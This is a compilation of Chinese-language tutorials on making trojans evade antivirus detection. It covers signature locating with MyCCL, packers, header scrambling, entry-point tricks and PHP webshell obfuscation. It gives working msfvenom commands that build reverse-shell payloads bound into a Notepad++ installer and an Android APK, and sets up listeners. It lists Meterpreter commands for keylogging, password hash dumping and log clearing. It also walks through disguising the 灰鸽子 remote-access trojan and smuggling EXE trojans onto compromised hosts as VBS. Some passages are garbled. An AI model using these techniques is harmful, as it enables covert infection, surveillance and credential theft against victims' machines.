教你做免杀木马,木马免杀教程

木马免杀技术一、杀毒软件的查杀模式杀毒软件的查杀模式分三种1.文件查杀2.内存查杀3.行为查杀这三种是目前杀毒软件常用的杀毒模式。

所谓的文件查杀就是杀毒软件对磁盘中的文件进行静态扫描，一旦发现文件带有病毒库中的病毒特征代码就给予查杀。

内存查杀是杀毒软件把病毒特征代码释放到内存中，然后与内存中的文件进行比对，发现有文件中带有病毒特征代码就给予查杀。

现在最厉害的内存查杀当然是瑞星了，其他杀毒软件也有内存查杀但比不上瑞星的厉害。

行为杀毒是杀毒软件用木马运行后的一些特定的行为作为判断是否为木马的依据。

比如：啊拉QQ大盗在运行后会增加一个名为NTdhcp.exe的进程，还有彩虹桥的服务端在运行后会在注册表添加名为HKLM\SOFTWARE\Microsoft\Active Setup\InstalledComponents\{9B71D88C-C598-4935-C5D1-43AA4DB90836}\stubpath的键值。

行为杀毒的典型杀毒软件—绿鹰PC万能精灵。

二.根据杀毒软件的查杀模式总结出免杀方法主要针对文件的文件查杀和内存查杀1.文件查杀A.加壳免杀B.修改壳程序免杀C.修改文件特征代码免杀D.加花指令免杀2.内存查杀A.修改内存特征代码B.阻止杀毒软件扫描内存====================================================== ================A.加壳免杀建议你选择一些生僻壳、茾@恰⑿驴牵 蛘呒佣嘀乜牵 馍钡氖奔洳怀?可能很快被杀,不过和加密工具配合使用一些杀毒软件是很容易过的但瑞星的内存不过。

B.修改壳程序免杀主要有两种：一是通过加花指令的方法把壳伪装成其它壳或者无壳程序。

C.修改文件特征代码免杀，此方法的针对性是非常强的，就是说一般情况下你是修改的什么杀毒软件的特征代码，那么就只可以在这种杀毒软件下免杀。

以前常用的工具有CCL特征码定位器，不过现在用起来不是那么方便了，比如黑防鸽子他有多出特征代码，给新手学习定位增加了一定的难度，现在主要推荐的是MYCCL特征码定位器，个人感觉定位速度快，准确率高，尤其对那些有多处特征码的定位。

MSF制作免杀⽊马1、制作exe免杀⽊马前⾔免杀技术全称为反杀毒技术Anti-Virus简称“免杀”，它指的是⼀种能使病毒⽊马免于被杀毒软件查杀的技术。

由于免杀技术的涉猎⾯⾮常⼴，其中包含反汇编、逆向⼯程、系统漏洞等技术，内容基本上都是修改病毒、⽊马的内容改变特征码，从⽽躲避了杀毒软件的查杀。

MSF编码在 Meatsploit 框架下免杀的⽅式之⼀就是使⽤MSF编码器。

其功能是对攻击载荷⽂件进⾏重新的排列编码，改变可执⾏⽂件中的代码形状，避免被杀软认出。

MSF 编码器可以将原可执⾏程序重新编码，⽣成⼀个新的⼆进制⽂件，这个⽂件运⾏以后，MSF 编码器会将原始程序解码到内存中并执⾏。

1.1 查看编码格式在Kali终端输⼊msfvemon -l encoders列出所有可⽤编码格式。

需要注意的是并不是所有的编码⽅式都适⽤于Windows系统，建议使⽤x86/shikata_ga_nai格式1.2 制作免杀⽊马由于裸奔⽊马容易被杀毒软件查杀，因此需要将⽊马捆绑到⼀个正常的软件上，这⾥使⽤notepad为例。

裸奔⽊马1 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.11 LPORT=1234 -f exe > /root/test.exe免杀⽊马1 msfvenom -p windows/shell_reverse_tcp LHOST=10.10.20.2 LPORT=3333 -e x86/shikata_ga_nai -x npp.7.8.6.Installer.exe -i 12 -f exe -o /root/npp1.exe⽣成exe⽊马⽂件1.3 运⾏msf监听模块1 msfconsole2 use multi/handler4set payload windows/shell_reverse_tcp5set LHOST 10.10.20.26set LPORT 33337 exploit1.4运⾏⽊马程序在Kali上开启监听，在客户机上执⾏刚才⽣成的⽊马⽂件，会⾃动连接上Kali，接下来就可以对客户机进⾏远程控制1 meterpreter下的命令：2 getwd 当前⽬录3 dir 查看所有⽂件4 cat c:\123.txt 查看⽂件123.txt内容（数据是字符串传递，所以加⼀个转义字符\）5 search -f cmd.exe （搜索名为cmd.exe⽂件所在⽬录）6 upload /root/桌⾯/backldoor.exe（要上传的⽂件） -> c:\（上传到的⽬录）上传⽂件7 download c:\123txt /root 下载⽂件8 clearev 清除⽇志9 getuid 当前⽤户10 ps 查看所⽤进程11 kill 杀死某个进程12 sysinfo 系统信息1314键盘记录15 keyscan_start 开始键盘记录16 keyscan_dump 查看结果17 keyscan_stop1819屏幕截图20 screenshot2122屏幕监控23 run vnc2425获取密⽂密码26 hashdump2728 shell29获取shell，进⼊cmd2、MSF制作安卓⽊马2.1 制作apk⽊马程序1 msfvenom -p android/meterpreter/reverse_tcp LHOST=172.16.105.184 LPORT=5555 R > /root/apk.apk2.2其他步骤可以参考上述的步骤2.3 命令sysinfo更多命令请使⽤help命令查看。

教你如何将你的木马躲过杀毒软件的查杀（制作免杀木马教程）一.关于免杀的来源为了让我们的木马在各种杀毒软件的威胁下活的更久. 二.什么叫免杀和查杀可分为二类: 1.文件免杀和查杀:不运行程序用杀毒软件进行对该程序的扫描，所得结果。

2.内存的免杀和查杀:判断的方法1运行后,用杀毒软件的内存查杀功能. 2用OD载入,一.关于免杀的来源为了让我们的木马在各种杀毒软件的威胁下活的更久.二.什么叫免杀和查杀可分为二类:1.文件免杀和查杀:不运行程序用杀毒软件进行对该程序的扫描，所得结果。

2.内存的免杀和查杀:判断的方法1>运行后,用杀毒软件的内存查杀功能.2>用OD载入,用杀毒软件的内存查杀功能.三.什么叫特征码1.含意:能识别一个程序是一个病毒的一段不大于64字节的特征串.2.为了减少误报率,一般杀毒软件会提取多段特征串,这时,我们往往改一处就可达到免杀效果,当然有些杀毒软件要同时改几处才能免杀.(这些方法以后详细介绍) 3.下面用一个示意图来具体来了解一下特征码的具体概念四.特征码的定位与原理1.特征码的查找方法:文件中的特征码被我们填入的数据（比如0）替换了，那杀毒软件就不会报警，以此确定特征码的位置2.特征码定位器的工作原理:原文件中部分字节替换为0，然后生成新文件，再根据杀毒软件来检测这些文件的结果判断特征码的位置五.认识特征码定位与修改的工具L(特征码定位器)2.OOydbg (特征码的修改)3.OC用于计算从文件地址到内存地址的小工具.4.UltaEdit-32(十六进制编辑器,用于特征码的手工准确定位或修改)六.特征码修改方法特征码修改包括文件特征码修改和内存特征码修改，因为这二种特征码的修改方法是通用的。

所以就对目前流行的特征码修改方法作个总节。

方法一:直接修改特征码的十六进制法1.修改方法:把特征码所对应的十六进制改成数字差1或差不多的十六进制.2.适用范围:一定要精确定位特征码所对应的十六进制,修改后一定要测试一下能否正常使用.方法二:修改字符串大小写法1.修改方法:把特征码所对应的内容是字符串的,只要把大小字互换一下就可以了.2.适用范围:特征码所对应的内容必需是字符串,否则不能成功.方法三:等价替换法1.修改方法:把特征码所对应的汇编指令命令中替换成功能类拟的指令.2.适用范围:特征码中必需有可以替换的汇编指令.比如JN,JNE 换成JMP等. 如果和我一样对汇编不懂的可以去查查8080汇编手册.方法四:指令顺序调换法1.修改方法:把具有特征码的代码顺序互换一下.2.适用范围:具有一定的局限性,代码互换后要不能影响程序的正常执行方法五:通用跳转法1.修改方法:把特征码移到零区域(指代码的空隙处),然后一个JMP又跳回来执行.2.适用范围:没有什么条件,是通用的改法,强烈建议大家要掌握这种改法.七.木马免杀的综合修改方法文件免杀方法：1.加冷门壳2.加花指令3.改程序入口点4.改木马文件特征码的5种常用方法5.还有其它的几种免杀修改技巧内存免杀方法：修改内存特征码：方法1>直接修改特征码的十六进制法方法2>修改字符串大小写法方法3>等价替换法方法4>指令顺序调换法方法5>通用跳转法木马的免杀[学用CLL定位文件和内存特怔码]1.首先我们来看下什么叫文件特征码.一般我们可以这样认为，一个木马程序在不运行的情况下，用杀毒软件查杀，若报警为病毒，说明存在该查毒软件的文件特征码的。

序回望免杀的初始：用WinHex逐字节修改木马免杀 -> 到后来软件保护(加壳)的加入、特征码免杀技术的公开、多层加壳的发现、反调试技术、针对于PE文件格式的免杀，到如今盛行的源码免杀。

再看反病毒的历程：从文件扫描技术、到通配符扫描技术、内存特征码扫描技术、虚拟机扫描技术、主动防御、启发式病毒查杀技术、云查杀。

我们不难发现，反病毒与反-反病毒这两项处于对立面的技术慢慢的壮大，并形成了各自所拥有的领域。

我们很想让我们心爱的黑软、木马在遇到杀软时依旧装TM牛B，反-反病毒技术的重要性就可想而知了。

但，任何技术都需要一个最简单的东西引领你：C语言，从一个简单的"Hello World!"开始；而反-反病毒：我想，还是得从MyCCL来打开免杀世界的大门……这里，MyCCL陪你开始.(注：这里只谈及使用技巧，非教程)分块个数体积小于200KB的木马在最开始选择50-100之间.体积大于200KB的木马在最开始选择10-30之间.尔后由大到小缩小范围定位。

单位长度事实上单位长度是由文件大小和分块个数决定。

相反，分块个数由文件大小和单位长度决定。

单位长度决定了每次填充的区域大小。

计算公式：文件大小÷ 分块个数 == 单位长度(其它自己推)填充方式不仅限于00、20或者90，可以是任意00-FF之间的16进制数值。

相比单一的填充方式，MultiCCL的随机数值填充方式更值得借鉴。

开始位置、结束位置、分段长度开始位置决定了从特定的偏移处开始填充，默认情况下在E0处开始填充。

有时候杀软会将特征码假定在PE头，因此可以填第一个区段的偏移量，一般第一个区段为.text，起始位置为00000600。

结束位置一般情况下为文件的末尾。

分段长度从开始位置到结束位置所经过的偏移大小。

而某些情况下，若要对某个特定区段进行特征码定位。

可以在开始位置填入区段的起始位置，在结束位置填入区段的结束地址，然后进行常规的定位流程。

第二章任务2 木马免杀2.1 木马免杀概述免杀，也就是反病毒（AntiVirus）与反间谍（AntiSpyware）的对立面，英文为Anti-AntiVirus（简写Virus AV），逐字翻译为“反-反病毒”，我们可以翻译为“反杀毒技术”。

木马免杀可以将其看为一种能使木马避免被杀毒软件查杀的技术。

木马免杀技术的涉猎面非常广，涉及反汇编、逆向工程甚至系统漏洞的发掘等其他顶级黑客技术。

2.2 木马免杀原理(1) 杀毒原理当前杀毒软件对病毒的查杀主要有特征代码法和行为监测法两种。

特征码就是能识别一个程序是病毒的一段不大于64字节的特征串。

特征码定位法分为文件查杀和内存查杀，杀毒软件公司拿到病毒的样本以后，定义一段病毒特征码到病毒库中，然后与扫描的文件比对，如果一致则认为是病毒。

内存查杀则是载入内存后再比对。

行为检测法是新出现的一种定义病毒的方法，它利用的原理是某些特定的病毒会有某些特定的行为来做出是否为病毒的判断。

(2) 木马免杀原理免杀在某种程度上可以说是杀毒软件的对立面。

杀毒软件通过特征码查杀病毒，相应的，通过修改特征码的方法来实现木马免杀。

特征码修改方法：方法一：直接修改特征码的十六进制法●修改方法：把特征码所对应的十六进制改成数字差1或差不多的十六进制。

●适用范围：一定要精确定位特征码所对应的十六进制，修改后一定要测试一下文件能否正常使用。

方法二：修改字符串大小写法●修改方法：如果特征码所对应的内容是字符串，只要把大小字互换一下就可以了。

●适用范围：特征码所对应的内容必须是字符串，否则不能成功。

方法三：等价替换法●修改方法：把特征码所对应的汇编指令，替换成功能类似的指令。

●适用范围：特征码中必须有可以替换的汇编指令，比如JE，JNE 换成JMP等。

方法四：指令顺序调换法●修改方法：把具有特征码的代码顺序互换一下。

●适用范围：具有一定的局限性，代码互换后必须不能影响程序的正常执行。

方法五：通用跳转法●修改方法：把特征码移到零区域（指代码的空隙处）执行后，使用JMP指令无条件调回原代码处继续执行下一条指令。

木马免杀全攻略和特征码替换简而告之……1.杀毒原理通常，一个病毒防御工作者拿到一个截获或上报上来的病毒时，先是分析这个病毒文件执行后的动作，所谓“动作”，就是指病毒文件执行后会做哪些操作。

例如会生成什么新文件、怎样更改注册表、怎样注册服务、打开什么端口等等。

搞明白这些后，下一步一般会研究这个病毒的文件结构，然后找出与众不同的地方，将其定义为特征码。

而这个特征码定义的高明与否，就要看他定义的位置是否刁钻，例如他如果定义的是病毒文件更改注册表键值那部分代码的话，这显然不会太难！因为只要病毒文件更改键值，99%的情况下这个文件里一定存在被更改键值的字符串，所以找到这段字符串的位置就可以定义特征码了。

但是针对这种特征码做免杀是非常容易的，只需找到相应的位置，并更改字母的大小写即可。

而如果从文件头找出一段特征码就是非常不容易的事情了……除此之外，所定义的特征码还有一个分支，即内存特征码。

所谓内存特征码就是指木马文件运行后释放到内存时所存在的特征，它的原理大体与上面介绍的文件特征码一样。

当特征码定义出来之后，就会被提交到另外的一个部门，然后进入病毒定义库，当用户更新后，以后杀毒软件在碰到符合要求的文件时就会将其毫不忧郁的杀掉！也就是说，杀毒软件只认特征码，不认文件。

由此可见，病毒防御工作者寻找特征码的方式也不过如此，但这只是定义病毒文件特征码的工作，别的例如修复被感染文件等技术步骤和本文无关，在这也就不介绍了，有兴趣的朋友可以自己研究一下。

2.免杀分类免杀的方法有很多，无奈没见哪为朋友综合系统的介绍，也苦了小菜们求学无门，只好掏银子找“师傅”，所以我就自告奋勇站出来一次，不足之处还请各位高手多多包涵……我个人总结的免杀方法总共分两类，即主动免杀与被动免杀。

一、主动免杀1.修改字符特征：主动查找可能的特征码，包括木马文件修改注册表、生成新文件的名称与路径、注入的进程名等动作，也包括运行过程中可能出现或一定会出现的字符等文件特征。

使⽤Shellter实现简单⽊马免杀⽊马免杀Shellter是⼀个开源的免杀⼯具，利⽤动态Shellcode注⼊来实现免杀的效果，我是使⽤的shellter免杀，做的不是很好，跟⼤家分享⼀下我的实验结果。

原理：⽣成⽊马⽂件，然后将⽣成的⽊马⽂件与**shellter免杀⼯具**捆绑，然后设置监听，将捆绑后的⽂件拷贝到WinXP系统中，双击后，发现攻击成功，最后将该⽂件在腾讯哈勃分析系统上分析。

实验环境：Kali系统 ip地址为: 192.168.159.128步骤：* 在Kali⽣成⼀个hacker.exe的⽊马⽂件。

命令为：msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.159.128 lport=4321 -f exe > /root/hacker.exe* 下载安装shellter免杀⼯具，切换到shellter⽂件夹下,执⾏shellter⼯具。

（注意:直接执⾏shellter⼯具会不成功，因为Kali系统不⽀持运⾏.exe⽂件，所以我们需要安装使⽤wine模拟Windows系统打开.exe⽂件。

）* 执⾏shellter⼯具之后，依次选择1. 选择A2. PE Target后⾯填写/root/hacker.exe3. 选择Y4. 选择L5. payload反弹选择1* 输⼊攻击机ip地址：192.168.159.128，端⼝为4321* 输⼊msfconsole进⼊metasploit。

* 进⼊监听模块。

命令为use exploit/multi/handler* 配置参数，设置payload反弹，设置lport,设置lhost。

* 开始监听，run。

* 把Kali⽣成的hacker.exe复制到物理机，双击,系统没有报毒。

* 返回Kali，会看到回弹了信息，攻击成功进⼊到meterpreter，可以进⾏后渗透。

制作免杀木马用工具更轻松等制作免杀木马用工具更轻松等制作免杀木马用工具更轻松Blovlg木马如果不做免杀处理，很容易被杀毒软件清除，虽然现在木马免杀的方法有很多，但几乎每种免杀方法公布后，都逃不过杀毒软件的眼睛。

今天要介绍的方法经过测试可以顺利逃过主流杀毒软件的查杀，希望可以给那些还在寻找免杀木马的朋友带来一点福音。

这里主要利用工具制作免杀木马，比较适合小菜，用到的工具有：1、Restorator.exe。

2、MaskPE 2.0最终版.exe。

3、RPolyCrypt.exe。

4、SimplePack.exe。

5、vmprotect.exe。

这些工具在网上都可以找到。

我们拿著名的灰鸽子木马做实验，配置灰鸽子大家都会了吧，我这里用的是黑防版。

配置完毕以后用Restorator.exe 打开，把HACKER部分的大写字母改成小写的，你可以多修改一些代码这样效果会更好一些，改完后保存退出，这一步骤是躲过杀毒软件的表面查杀。

打开MaskPE2.0最终版exe，点击“LoadFile”按钮，载入灰鸽子服务端后。

直接点击“Make File”按钮输入生成的文件名如1.exe。

打开SimplePackexe，托动1.exe到界面中。

选中“压缩资源”复选框，然后点击“压缩”。

用RPolyCrypt.exe直接处理1.exe，默认设置不用改，直接点击左边的按钮就可以了。

最后打开vmproteot.exe，载入1.exe点击“Next”，的界面，点“Add>”再点“Next”弹出确定框，点击“OK”。

直到最后要注意，把“Exe cute"C:\......"”这个复选框去掉，要不然的话，自己做的免杀鸽子就会在自己的机器上运行了，那样的话就惨了!经过这样的一番加工，你的免杀版灰鸽子就完成了，而且绝对可以躲过最新的杀毒软件查杀，大家可以试试。

告诫大家不要做坏事啊。

另外免杀方法公布出来就离死不远了，我这里只是抛砖引玉，希望大家多实践找到一种自己的免杀方法。

本课主要讲解：1：对免杀的一些认识！2：MYCCL工具的使用方法首先大家先关闭杀毒软件，因为你配置的木马被杀掉没办法做免杀首先我们要了解下特征码，特征码就是杀毒软件内病毒库里面的特征有类似或者相同的特征被杀毒发现就会查杀我们今天的第一课就先学习表面特征码定位我们用到的工具是MYCCL打开工具后我们点击文件之后加载进去你生成的无壳的木马当然壳上壳也是可以的但不适合新手加载木马后会出现这样的页面好了这里已经加载好了木马这里教大家做的是表面的特征码定位所以分块数量不要大于100开始位置设定400这样不容易出现死循环，这也是一点点经验当然也要看是什么木马通常的远控木马表面特征码这样做是没问题的详细设置如下图这样就设置好了MYCCL我们就可以进行下一步了我们设置好这里之后直接点击生成成功后桌面会多出来一个文件夹那么我们点击生成如下图这之后桌面会出现一个文件夹之后用杀毒对这个文件夹进行杀毒杀毒后把查杀出来的病毒全部删除删除后关闭杀毒我们继续下一步删除所有病毒文件后我们关闭杀毒之后再点击MYCCL上面的二次处理效果如下图大家可以看下，这里已经出现了一处特征码那么接下来需要做的就是反复的去二次处理—杀毒—二次处理—杀毒这个时间是比较长的我就不单个截图了，什么时候停止呢就是一直到查杀不出病毒为止直到查杀不出病毒我们再停止进行下一步我这里已经查杀好了等查杀出没有病毒的时候我们再点击一次二次处理就会出现这样的特征码如下图大家看下这里的特征码它的单位长度是比较大的，我们没法修改所以我们需要再处理一下所以我们要点击特征区间如下图那么我们接下来就要复合定位在第一处特征码上面点击左键选择之后点击右键如图之后大家再看图分块数量我们还改成100这里开始位置就不需要再改动了之后我们点击生成之后我们再继续反复之前的这种操作杀毒，接着二次处理，直到发现不了病毒为止大家在重复二次处理的时候要注意如果分块数量大于100 我们就改成100如果不大于100 它是多少我们就不用管了我们就直接点生成就可以了好了我这里已经杀不出病毒了特征码如图第一处的特征码大家可以看下是：00000002之后我们在00000002 特征码上面再点击右键复合定位之后大家看下这里如图那么我们就要把单位长度改为1之后他的分块数量自动分为2之后我们再点击生成生成后我们再查杀单位长度特征码为1的时候是最精确的现在第一处特征码已经出现了这时候我们再查杀就不会有毒了查杀无毒后我们再次点击二次处理之后我们第一处的特征码已经查到了如图：之后我们就需要去复合定位第二处特征码和之前的复合定位一样的我就不一一给大家写出来了直到所有特征全部为00000001 或者00000002都是可以的这里如果再大我们就需要接着复合定位单位长度还是要改成1直到特征码为00000001 或00000002 都是可以的这节课就讲到这里下节课再见。

本文由百度文库批量上传下载工具生成Created By Yelky QQ:283830411免杀木马的最全最新思路首先我给大家介绍今天的主角.一个名叫"秘密行动"的新工具,这个工具把常用的几个小程序集合于一身,功能十分强大,可以完成捆绑程序,修改特征码,十六进制编辑及分割合并文件等.这次主要是利用这个新工具中集成的几个最新木马伪装技术,完成我们的木要马加密过程.下面就跟着我来一步一步将木马改造成超级无敌木马吧!------------------------------------------------------步骤一:增加字节法我们都知道,杀毒软件是通过程序中某个位置的病毒特征码,来对文件进行识别判断是否是木马病毒的,改变了木马程序文件夹病毒特征码,就可以有效的躲过杀毒软件的查杀,更改木马的病毒特征码有几种方法,比如直接用特殊的工具进行修改,或者进行加壳等,但是由于杀毒软件的病毒识别技术在不断的提高,杀毒软件往往都通过同时对几处病毒特征码进行识别,因此普照通的特征码修改方法已经失效了,这里要为大家介绍的是一种新方法-----增加字节法.---------------------------------------------------每个程序文件中都存在一些剩余空间,木马程序也不例外,我们可以向木马程序文件中增另一些空字节,从而改变文件的整个代码结构,但是并不影响程序的执行,由于程序的代码结构已经发生了变化,相应的病毒特征码位置也发生了改变,因此杀毒软件也无法对木马程序进行查杀了.点击秘密行动程序界面中的"Add Bytes" (增加字节)按钮,在增加字节页面中输入要增加的字节数.默认的增加字节数是1000字节,但是过多的字节数会增加木马程序的体积,因此可以先增加一个比较小的字节数目击者.如果增加字节后,用杀毒软件检测能查出木马,那么再逐渐加大字节数.直到无法查出病毒为止.其实有时只需增加23个字节,就足以改变特征码让木马程序躲过杀毒软件了.设置了合理的字节数后,点击"选择文件"旁的浏览按钮,浏览选择要进行增加字节处理的木马程序,然后点击"Add Bytes"按钮,即可在木马程序中增加指定的字节数了,这里我们和坂的是Pcshare生成的木马服务端程序,通过两次增加23个字节数后,用杀毒软件进行查杀,提示没有检测到病毒.-----------------------------------------------------步骤二:EXE文件巧变VBS在windows系统中,默认情况下都安装了Wscript,因此可以执行VBS文件,如果我们将木马程序转化为VBS文件后,由于许多杀毒软件不对硬盘中的VBS文件检测.因此木马程序就可以躲过病毒防火墙的眼睛,同时,将木马程序转化为VBS文件还有一个非常有利的地方,比如在获得一个溢出的shell窗口后,发现被溢出主机上安装了防火墙,无法上传木马时,可以通过直接将VBS代码贴入shell窗口,在远程主机中写入一个VBS文件,达到上传木马的目标.-------------------------------------------------------1.躲过杀毒软件点击秘密行动程序界面中的"Create VBS"按钮,在VBS文件生成页面中点击"选择文件",指定木马程序文件后,将自动显示输入VBS文件名.点击"Make script"按钮,程序就会自动将EXE文件转化为VBS文件了.转化成功以后出现成功提示,并显示了源EXE文件体积和新生成VBS文件的大小,可以看出经过转换后木马程序体积并没有增大多少.虽然在我的电脑上启用了杀毒软件的即时监控功能,但是在运行生成的VBS文件时,杀毒软件并没有发出病毒警报,可见生成的VBS成功地躲过了杀毒软件查杀.--------------------------------------------------------2.上传木马当我们获得一个远程溢出窗口时,如果远程主机上安装了防火墙和杀毒软件,无法上传木马时,可以用秘密行动软件将木马程序按上面的方法转化成为VBS文件.然后用记事本打开生成的VBS文件,将所有程序代码复制到剪切板中.再返回溢出的shell窗口.输入命令"copy con muma.vbs";回车后,在shell窗口中点击鼠标右键,选择"粘贴"命令,将所有VBS代码贴入shell窗口中,代码贴入后,按下<CTRL>+Z组合键,屏幕上会看到^Z的提示.这个时候再敲一次回画.系统会提示"已复制一个文件",这就表示文件创建成功了,在远程主机上生成一个名为"muma.vbs"的文件,在shell窗口运行"muma.vbs",木马服务端程序就已经悄悄在远程主机上运行了.---------------------------------------------------------步骤三:压缩/打乱头文件我们通常会通过压缩程序文件的方法,达到更改木马程序特征码,以躲过杀毒软件的查杀,但是现在的杀毒软件反病毒能力也越来越高.普照通的加壳已经失效了.因此必须想出新的木马伪装方法.其实在压缩过的森马程序上再加上一道工序.打乱加壳文件的头文件.就可以躲过病毒防火墙的眼睛.---------------------------------------------------------1.加壳运行秘密行动程序,点击界面中的'pack/scramble"按钮,打开加壳与打乱头文件界面,首先浏览指定某个木马服务端程序,然后点击"pack" 按钮,对木马程序进行加壳.程序使用的是UPX壳,一方面可以减小程序的体和服,另外一方面可以初步更改木马特征码.2.打乱头文件.已经将木马程序用UPX加壳过了,现在要将加的UPX壳头文件打乱,让文件无法再用UPX脱壳工具来脱壳.点击程序界面中的"scramble"按钮,打开UPX-scrambler对话窗口,点击"target"旁的浏览按钮,浏览选择刚才加过壳的木马程序,勾选"keep backup"项,在打乱头文件前,先对程序文件进行备份.----------------------------------------------------------小提示:在使用打乱头文件时,一定要选择经过UPX加壳的程序,未加壳或使用其它加壳工具加壳的程序,在打乱头文件后,很可能会造成文件被破坏而无法正常运行.--------------------------------------------------------设置完毕后,点击'scramble"按钮,即可对木马程序的头文件进行重组修改,打乱原有的头文件结构.打乱头文件的操作过程可能需要的时候会相对长一些,而且会重复进行多次,稍微耐心一点,很快就会生成一个新的木马程序了.新的木马程序用查壳软件无法查出使用了什么壳,用杀毒软件也无法进行查杀.除了上面介绍的几个功能外,在秘密行动中还集成了几个常用的木马伪装功能,比如捆绑程序,修改特征码等,使用起来非常简单,在一般的情况下也足以满足大家的需要了.本文由百度文库批量上传下载工具生成Created By Yelky QQ:283830411。

如何实现一句话木马并免杀一句话木马是指通过一句短小的代码语句实现对目标计算机的入侵控制，由于其隐蔽性和高效性，成为黑客攻击的主要工具之一。

而如何实现一句话木马并免杀，是当前网络攻防领域中比较热门的话题之一。

一、一句话木马的实现方法1.利用 WebShell：WebShell是黑客通过漏洞对服务器进行攻击后，上传或创建的一个类似终端界面的脚本文件。

黑客通过以Web的方式访问WebShell获得服务器权限后，就可以在服务器上执行各种操作，如上传文件、下载数据库、执行系统命令等。

2.利用“eval”函数：eval函数是PHP中的一个函数，它可以将字符串作为PHP代码来执行。

黑客可以将一段木马代码写成字符串，并把字符串传递给eval函数来执行，从而实现一句话木马的效果。

3.利用文件包含漏洞：在编写PHP程序时，如果没有对用户输入的动态参数做安全过滤，就容易产生文件包含漏洞。

黑客可以通过构造一些特殊的参数来绕过安全检查，实现在网站上执行自己的代码。

二、一句话木马免杀的技巧由于一句话木马的代码非常短小，通常只有一行，因此很难通过传统的病毒查杀软件进行检测。

但为了避免被杀毒软件查杀，黑客们也在不断地探索免杀的方法。

1.字符串混淆：一句话木马的免杀方法之一就是字符串混淆。

将木马代码进行特殊编码、手动解码，或在代码中加入大量无意义的字符和空格等，使其难以被查杀软件发现。

2.变量替换：在一句话木马代码中，变量名可以随意命名。

将变量名更改为常见函数名或参数，可以使代码看起来更像正常的PHP代码，从而避免被杀毒软件查杀。

3.动态修改：在传递一句话木马代码时，可以采用动态修改的方式，每次传递时使用不同的代码段，从而使杀毒软件难以对其进行查杀。

4.分段传输：将一句话木马代码分成多个部分进行传输，每次只传输一部分，从而规避杀毒软件的检测。

三、防范一句话木马的方法1.及时更新补丁：一般情况下，黑客攻击使用的都是已知漏洞，通过及时更新软件补丁可以减少黑客攻击的成功率。

分享下木马免杀的个人经验-电脑资料PE类：EXE. dll1.脱壳解密脱壳在木马免杀中由为重要！，。

所以希望大家好好学习脱壳脱壳的好坏直接影响到木马免杀效果（如果不完全脱壳，在<定位内存特征码>可能会使定位中没发现特征码但是运行中又发现木马。

）2.定位特征码一般从大范围定位后逐渐缩小范围（字节型）（个数型）一般从生成100个数的大致定位特征码后转入字节型定位。

单一文件特征码定位：CLL MYCLL multiCCL复合文件特征码定位：MYCLL multiCCL内存特征码定位：OD（一半一半定位） MYCLL multiCCL [一般都要确定你的文件是否完美完全脱壳后在进行文件特征码定位]3.特征码修改简单的等效代码转换如下：（不过有时改后也损坏文件所以看情况）push 变popje 变jnzadd 变 subadd ecx,2 可以改为sub ecx,-2加ecx内存器＋2 减ecx内存器-2 - -2得＝2上面的等效代码用不了还是乖乖用，JMP跳转法把特征码转移4.附加数据加密算法变形这个方法已经被pcshare冰雨发布了，就是pcshare附加数据的配置信息是xor 加密的。

被杀毒定义了所以我们只要改算法 xor 值变一下就可以了！5.RAR自解压（加密）说白就是捆绑而已呵呵，不过去除右键对部分杀毒有效无法分离出木马！可以躲避查杀而且可变性比较强所以还有用武之地！*******************************************************网页木马类： JS html htm asp 等1.拆分变量，电脑资料《分享下木马免杀的个人经验》(https://www.)。

用&连接符号，拆分变量2.加入垃圾代码。

和PE免杀花指令差不多，一些无用的垃圾变量或者空格一些特殊字符或者GIF98 类似的文件头来做“花指令”呵呵！3.等值代码修改把html全部改htm 效果一样4.代码添零在记事本中加入空格，然后用16进制的编辑器（Uedit32）打开把空格对应（20）替换成（00）即可该方法运用广泛。

木马精华免杀教程教程来自【暗黑网络】暗黑网络技术公会让更多的朋友了解黑客-YY496342本公会采用YY方式是让您更加方便的交流和学习，本公会，免费赠送工具，教程，等一切免费，大量招收导师如果觉得你行那就来试试吧YY496342本公会+此文档只是让大家多一点防范的意识请勿用于非法第一部分：对国内外杀毒软件分析在讲特征码前，先要分析国内外著名杀毒软件的查杀特点。

大家在使用木马过程都会发现，内存查杀，一般都指得被瑞星的内存查杀。

瑞星的内存查杀功能是同类杀毒软件中最强的一款杀毒软件。

像强悍的卡巴，金山，等等它们的内存查杀意义不大,会制作免杀木马的人都知道,像这类杀毒软件,只要文件免杀,内存也就免杀了.还有江民也有内存查杀功能,但内存查杀功能比较弱.只针对影响力非常大的病毒程序.一般的黑客软件都没有提取内存特征码.第二部分：木马免杀的对策一.要使一个木马免杀，首先要准备一个不加壳的木马，这点非常重要，否则下面的免杀操作就不能进行下去。

二.然后我们要木马的内存免杀，从上面分析可以看出，目前的内存查杀，只有瑞星最强，其它杀毒软件内存查杀现在还不起作用所以我们只针对瑞星的内存查杀，要进行内存特征码的定位和修改，才能达到内存免杀。

二.对符其它的杀毒软件，比如江民，金山，诺顿,卡巴.我们可以采用下面的方法,或这些方面的组合使用.1>.入口点加1免杀法.2>.变化入口地址免杀法3>.加花指令法免杀法4>.加壳或加伪装壳免杀法.5>.打乱壳的头文件免杀法.6>.修改文件特征码免杀法.第三部分:免杀技术实例演示部分一.入口点加1免杀法:(NC)1.用到工具:PEditor2.特点:非常简单实用,但有时还会被卡巴查杀.3.操作要点:用PEditor打开无壳木马程序,把原入口点加1即可.二.变化入口地址免杀法:(NC)1.用到工具:OllyDbg,PEditor2.特点:操作也比较容易,而且免杀效果比入口点加1点要佳.3.操作要点:用OD载入无壳的木马程序,把入口点的前二句移到零区域去执行,然后又跳回到入口点的下面第三句继续执行.最后用PEditor把入口点改成零区域的地址.三.加花指令法免杀法:(Sniff)1.用到工具:OllyDbg,PEditor2.特点:免杀通用性非常好,加了花指令后,就基本达到大量杀毒软件的免杀.3.操作要点:用OD打开无壳的木马程序,找到零区域,把我们准备好的花指令填进去填好后又跳回到入口点,保存好后,再用PEditor把入口点改成零区域处填入花指令的着地址.四.加壳或加伪装壳免杀法:(findpass)1.用到工具:一些冷门壳,或加伪装壳的工具,比如木马彩衣等.2.特点:操作简单化,但免杀的时间不长,可能很快被杀,也很难躲过卡巴的追杀.3.操作要点:为了达到更好的免杀效果可采用多重加壳,或加了壳后在加伪装壳的免杀效果更佳.五.打乱壳的头文件免杀法:(nc)1.用到工具:秘密行动,UPX加壳工具.2.特点:操作也是傻瓜化,免杀效果也正当不错,特别对卡巴的免杀效果非常好.3.操作要点:首先一定要把没加过壳的木马程序用UPX加层壳,然后用秘密行动这款工具中的SCramble功能进行把UP